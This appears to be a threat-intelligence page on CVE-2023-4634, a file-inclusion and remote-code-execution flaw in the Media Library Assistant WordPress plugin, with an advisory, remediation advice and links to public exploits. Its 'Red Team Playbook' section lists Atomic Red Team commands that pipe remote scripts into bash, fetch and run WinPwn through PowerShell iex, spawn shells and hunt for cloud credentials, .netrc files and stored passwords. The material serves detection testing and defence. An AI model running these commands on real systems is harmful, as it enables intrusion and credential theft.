CVE-2023-4634
Overview
This vulnerability is a Local File Inclusion (LFI) and Remote Code Execution (RCE) flaw caused by insufficient validation of file paths supplied via the 'mla_stream_file' parameter. The affected component is the ~/includes/mla-stream-image.php file within the dglingren Media Library Assistant WordPress plugin, which processes images using the Imagick() library. The root cause lies in the lack of controls restricting file path inputs, enabling malicious file references.
Vulnerability Description
The Media Library Assistant plugin for WordPress is vulnerable to Local File Inclusion and Remote Code Execution in versions up to, and including, 3.09. This is due to insufficient controls on file paths being supplied to the 'mla_stream_file' parameter from the ~/includes/mla-stream-image.php file, where images are processed via Imagick(). This makes it possible for unauthenticated attackers to supply files via FTP that will make directory lists, local file inclusion, and remote code execution possible.
Impact
An unauthenticated attacker can exploit this vulnerability to execute arbitrary code remotely on the server hosting the WordPress site by supplying malicious files via FTP and invoking them through the vulnerable parameter. This can lead to full system compromise, data exposure, and service disruption. The attack requires network access but no user interaction or privileges, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N. This elevates the risk of unauthorized control over the affected environment.
Solution
To remediate this vulnerability, upgrade the Media Library Assistant plugin to a version later than 3.09 where the issue is addressed. Detailed patch instructions and version updates are documented in the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/05c68377-feb6-442d-a3a0-1fbc246c7cbf. Users should replace vulnerable plugin files and verify that the ~/includes/mla-stream-image.php script properly validates file path inputs to prevent exploitation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The Media Library Assistant plugin for WordPress is susceptible to a critical vulnerability characterized by Local File Inclusion (LFI) and Remote Code Execution (RCE). This flaw arises from inadequate validation of file paths supplied to the 'mla_stream_file' parameter within the ~/includes/mla-stream-image.php file. The vulnerability is particularly concerning because it allows unauthenticated attackers to manipulate file paths, potentially leading to the inclusion of arbitrary files from the server. The underlying issue lies in the way the plugin processes images using the Imagick library, which, if exploited, can lead to unauthorized access and execution of malicious code on the server.
Attack vectors for this vulnerability are varied and can be executed with relative ease. An attacker could leverage FTP access to upload malicious files to the server, subsequently manipulating the 'mla_stream_file' parameter to include these files. This could allow the attacker to execute scripts or commands on the server, leading to a complete compromise of the affected WordPress instance. Moreover, the ability to perform directory listing could expose sensitive files and configurations, further facilitating the attacker's efforts to escalate privileges or pivot to other systems within the network. The simplicity of exploiting this vulnerability, combined with the high impact potential, makes it a significant threat to any organization using the affected plugin.
The real-world implications of this vulnerability are profound, particularly for businesses that rely on WordPress for their web presence. A successful exploitation could result in unauthorized access to sensitive data, defacement of websites, or even the deployment of malware that could affect end-users. The potential for data breaches not only poses a risk to the organization’s reputation but could also lead to regulatory penalties, especially if personal data is compromised. Furthermore, the financial ramifications of remediation efforts, including incident response and recovery, can be substantial. Organizations may also face loss of customer trust, which can have long-lasting effects on their business operations.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating the Media Library Assistant plugin to the latest version is critical, as updates often contain patches for known vulnerabilities. Additionally, employing a web application firewall (WAF) can help filter out malicious requests that attempt to exploit this vulnerability. Monitoring server logs for unusual activity, such as unexpected file inclusions or unauthorized access attempts, can also aid in early detection of exploitation attempts. Furthermore, restricting file upload permissions and implementing strict access controls can significantly reduce the attack surface, making it more difficult for attackers to exploit this vulnerability.
In conclusion, the Local File Inclusion and Remote Code Execution vulnerability in the Media Library Assistant plugin for WordPress represents a serious threat to organizations utilizing this software. The ease of exploitation, coupled with the potential for significant impact on business operations, underscores the importance of proactive security measures. By staying informed about vulnerabilities, regularly updating software, and implementing robust security practices, organizations can better protect themselves against such threats and ensure the integrity of their web applications.
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2023-4634, indicating a modest rise in attempts to exploit the Local File Inclusion and Remote Code Execution vulnerabilities in the Media Library Assistant plugin. While the overall trend remains relatively stable, this uptick suggests that threat actors continue to probe affected environments, likely leveraging publicly available proof-of-concept exploits. The persistence of these attempts underscores the ongoing relevance of this vulnerability in the wild, particularly given its critical severity and ease of exploitation. Although no rapid escalation or significant surge has been observed, defenders should recognize that the vulnerability remains an active target. Consequently, the risk posture associated with CVE-2023-4634 remains elevated, warranting continued vigilance and monitoring to detect potential exploitation attempts before they result in operational impact.
Update 2 — August 20, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2023-4634, reflecting a modest rise in attacker activity exploiting the Media Library Assistant plugin vulnerability. While the overall trend remains stable without a rapid surge, this incremental uptick indicates persistent adversary interest and ongoing reconnaissance or exploitation efforts. The availability of multiple proof-of-concept exploits continues to lower the barrier for threat actors, sustaining the vulnerability’s attractiveness as a vector for remote code execution and local file inclusion attacks. This subtle rise in activity underscores the necessity for defenders to maintain heightened monitoring and response readiness, as even marginal increases can precede broader exploitation campaigns. Consequently, the threat level associated with CVE-2023-4634 remains critically high, with the vulnerability continuing to represent a significant risk to WordPress environments utilizing the affected plugin.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Davidlingren | Media Library Assistant | All |
cpe:2.3:a:davidlingren:media_library_assistant:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Media Library Assistant Wordpress Plugin - RCE and LFI | Florent MONTEL | webapps | php | - | View |
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Patrowl/CVE-2023-4634
CVE-2023-4634
|
Patrowl | 47 | 9 | 2023-09-05 | View |
|
Evillm/CVE-2023-4634-PoC
|
Evillm | 0 | 0 | 2026-02-04 | View |
Threat Feed
32 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-4634 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/05c68377-feb6-442d-a3a0-1fbc246c7cbf?source=cve |
| packetstormsecurity.com |
GitHub CVE
|
https://packetstormsecurity.com/files/174508/wpmla309-lfiexec.tgz |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2955933%40media-library-assistant&new=2955933%40media-library-assistant&sfp_email=&sfph_mail=#file4 |
| patrowl.io |
GitHub CVE
|
https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/ |
| github.com |
GitHub CVE
|
https://github.com/Patrowl/CVE-2023-4634/ |